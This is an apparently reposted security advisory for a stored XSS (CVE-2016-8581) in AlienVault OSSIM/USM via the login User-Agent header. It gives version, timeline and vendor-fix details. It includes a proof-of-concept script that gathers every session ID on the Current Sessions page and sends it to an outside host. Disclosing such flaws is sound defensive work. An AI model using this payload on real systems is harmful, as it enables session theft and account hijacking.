Details=======Product: Alienvault OSSIM/USMVulnerability: Stored XSSAuthor: Peter Lapp, lappsec () gmail comCVE: CVE-2016-8581CVSS: 3.5Vulnerable Versions: <=5.3.1Fixed Version: 5.3.2Vulnerability Details=====================A stored XSS vulnerability exists in the User-Agent header of thelogin process. It's possible to inject a script into that header thatthen gets executed when mousing over the User-Agent field in Settings-> Current Sessions.POC===The POC uses jQuery to send all session IDs on the "Current Sessions"page to an arbitrary site (Google, in this case)<script>$('#ops_table.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>Timeline========08/03/16 - Reported to Vendor10/03/16 - Fixed in version 5.3.2References==========https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities
0 komentar:
Post a Comment
I just a newbie and student, don't using this article for criminal